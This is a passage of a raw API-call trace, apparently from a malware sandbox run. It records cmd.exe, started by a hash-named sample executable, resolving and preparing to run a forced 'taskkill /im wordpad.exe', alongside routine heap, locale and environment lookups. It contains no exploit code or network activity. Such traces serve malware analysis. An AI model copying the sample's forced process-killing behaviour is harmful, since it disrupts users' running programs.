(_String1="KEYS", _String2="TIME") returned -9 [0228.775] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0228.775] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0228.775] GetProcessHeap () returned 0x550000 [0228.775] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x44) returned 0x5571b0 [0228.775] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0228.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0228.776] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0228.776] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x557200 [0228.776] FindClose (in: hFindFile=0x557200 | out: hFindFile=0x557200) returned 1 [0228.776] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x557200 [0228.776] FindClose (in: hFindFile=0x557200 | out: hFindFile=0x557200) returned 1 [0228.777] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0228.777] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x557200 [0228.777] FindClose (in: hFindFile=0x557200 | out: hFindFile=0x557200) returned 1 [0228.777] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0228.777] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0228.777] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0228.777] GetProcessHeap () returned 0x550000 [0228.778] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55a8a0) returned 1 [0228.778] GetEnvironmentStringsW () returned 0x557fe8* [0228.778] GetProcessHeap () returned 0x550000 [0228.778] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa76) returned 0x559e60 [0228.778] FreeEnvironmentStringsA (penv="=") returned 1 [0228.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0228.778] GetProcessHeap () returned 0x550000 [0228.779] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x5571b0) returned 1 [0228.779] GetProcessHeap () returned 0x550000 [0228.779] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400e) returned 0x55bd60 [0228.780] GetProcessHeap () returned 0x550000 [0228.780] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x5571b0 [0228.780] GetProcessHeap () returned 0x550000 [0228.780] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4008) returned 0x55fd78 [0228.781] GetProcessHeap () returned 0x550000 [0228.781] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4008) returned 0x563d88 [0228.783] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0228.783] GetProcessHeap () returned 0x550000 [0228.783] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x418) returned 0x55a8e0 [0228.783] SetErrorMode (uMode=0x0) returned 0x8003 [0228.783] SetErrorMode (uMode=0x1) returned 0x0 [0228.784] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x55a8e8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0228.784] SetErrorMode (uMode=0x8003) returned 0x1 [0228.784] GetProcessHeap () returned 0x550000 [0228.784] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x55a8e0, Size=0x7a) returned 0x55a8e0 [0228.784] GetProcessHeap () returned 0x550000 [0228.784] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x55a8e0) returned 0x7a [0228.784] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0228.784] GetProcessHeap () returned 0x550000 [0228.784] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x557200 [0228.784] GetProcessHeap () returned 0x550000 [0228.784] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb8) returned 0x55a968 [0228.784] GetProcessHeap () returned 0x550000 [0228.785] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x55a968, Size=0x62) returned 0x55a968 [0228.785] GetProcessHeap () returned 0x550000 [0228.785] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x55a968) returned 0x62 [0228.785] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0228.785] GetProcessHeap () returned 0x550000 [0228.785] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe0) returned 0x55a9d8 [0228.790] GetProcessHeap () returned 0x550000 [0228.790] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x55a9d8, Size=0x76) returned 0x55a9d8 [0228.790] GetProcessHeap () returned 0x550000 [0228.790] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x55a9d8) returned 0x76 [0228.790] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.791] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im wordpad.exe", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0228.791] GetLastError () returned 0x3 [0228.791] GetProcessHeap () returned 0x550000 [0228.791] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55fd78) returned 1 [0228.792] GetProcessHeap () returned 0x550000 [0228.792] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x563d88) returned 1 [0228.792] GetProcessHeap () returned 0x550000 [0228.793] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55bd60) returned 1 [0228.793] GetConsoleOutputCP () returned 0x1b5 [0228.796] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0228.796] GetUserDefaultLCID () returned 0x409 [0228.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0228.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0228.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0228.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0228.797] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0228.799] GetProcessHeap () returned 0x550000 [0228.799] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20c) returned 0x55aaa0 [0228.799] GetConsoleTitleW (in: lpConsoleTitle=0x55aaa0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0228.800] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0228.800] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0228.800] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0228.800] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0228.800] GetProcessHeap () returned 0x550000 [0228.801] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x55bd60 [0228.801] GetProcessHeap () returned 0x550000 [0228.801] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55bd60) returned 1 [0228.802] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0228.802] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0228.802] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0228.802] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0228.802] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0228.802] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0228.802] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0228.802] GetProcessHeap () returned 0x550000 [0228.802] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x55acb8 [0228.802] GetProcessHeap () returned 0x550000 [0228.803] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1a) returned 0x557e90 [0228.803] GetProcessHeap () returned 0x550000 [0228.803] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x30) returned 0x557270 [0228.804] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0228.805] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0228.805] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0228.805] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0228.805] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0228.805] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0228.805] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0228.805] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0228.805] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0228.805] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0228.805] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0228.805] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0228.805] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0228.805] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0228.805] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0228.805] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0228.805] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0228.805] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0228.805] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0228.806] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0228.806] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0228.806] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0228.806] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0228.806] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0228.806] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0228.806] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0228.806] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0228.806] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0228.806] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0228.806] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0228.806] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0228.806] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0228.806] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0228.806] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0228.806] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0228.806] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0228.806] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0228.806] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0228.806] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0228.806] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0228.806] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0228.807] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0228.807] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0228.807] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0228.807] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0228.807] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0228.807] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0228.807] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0228.807] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0228.807] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0228.807] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0228.808] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0228.808] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0228.808] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0228.808] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0228.808] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0228.808] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0228.808] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0228.808] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0228.808] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0228.808] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0228.808] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0228.808] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0228.808] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0228.808] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0228.808] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0228.808] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0228.808] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0228.808] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0228.808] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0228.808] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0228.808] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0228.808] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0228.808] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0228.809] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0228.809] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0228.809] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0228.809] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0228.809] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0228.809] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0228.809] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0228.809] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0228.809] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0228.809] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0228.809] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0228.809] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0228.809] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0228.809] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0228.810] GetProcessHeap () returned 0x550000 [0228.810] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x55ad18 [0228.810] GetProcessHeap () returned 0x550000 [0228.810] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x42) returned 0x55af30 [0228.810] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0228.811] GetProcessHeap () returned 0x550000 [0228.811] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x418) returned 0x5505c8 [0228.811] SetErrorMode (uMode=0x0) returned 0x8003 [0228.811] SetErrorMode (uMode=0x1) returned 0x0 [0228.811] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5505d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0228.811] SetErrorMode (uMode=0x8003) returned 0x1 [0228.811] GetProcessHeap () returned 0x550000 [0228.811] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5505c8, Size=0x56) returned 0x5505c8 [0228.811] GetProcessHeap () returned 0x550000 [0228.811] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5505c8) returned 0x56 [0228.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0228.811] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0228.812] GetProcessHeap () returned 0x550000 [0228.812] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x110) returned 0x55af80 [0228.812] GetProcessHeap () returned 0x550000 [0228.812] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x218) returned 0x55b098 [0228.817] GetProcessHeap () returned 0x550000 [0228.817] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x55b098, Size=0x112) returned 0x55b098 [0228.817] GetProcessHeap () returned 0x550000 [0228.817] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x55b098) returned 0x112 [0228.817] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0228.817] GetProcessHeap () returned 0x550000 [0228.817] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe0) returned 0x55b1b8 [0228.819] GetProcessHeap () returned 0x550000 [0228.819] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x55b1b8, Size=0x76) returned 0x55b1b8 [0228.819] GetProcessHeap () returned 0x550000 [0228.819] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x55b1b8) returned 0x76 [0228.819] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.819] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0228.820] GetLastError () returned 0x2 [0228.820] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.820] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x55b238 [0228.821] GetProcessHeap () returned 0x550000 [0228.821] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x557700 [0228.821] FindClose (in: hFindFile=0x55b238 | out: hFindFile=0x55b238) returned 1 [0228.821] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0228.821] GetLastError () returned 0x2 [0228.821] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x55b238 [0228.821] GetProcessHeap () returned 0x550000 [0228.821] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x557700, Size=0x4) returned 0x55b278 [0228.821] FindClose (in: hFindFile=0x55b238 | out: hFindFile=0x55b238) returned 1 [0228.821] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0228.821] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0228.821] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0228.822] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0228.822] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0228.822] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154)) [0228.822] GetProcessHeap () returned 0x550000 [0228.822] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x18) returned 0x557640 [0228.822] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0228.823] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0228.824] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0228.824] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0228.824] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0228.824] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0228.824] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0228.824] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0228.824] GetProcessHeap () returned 0x550000 [0228.824] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x557640) returned 1 [0228.824] GetProcessHeap () returned 0x550000 [0228.824] RtlAllocateHeap 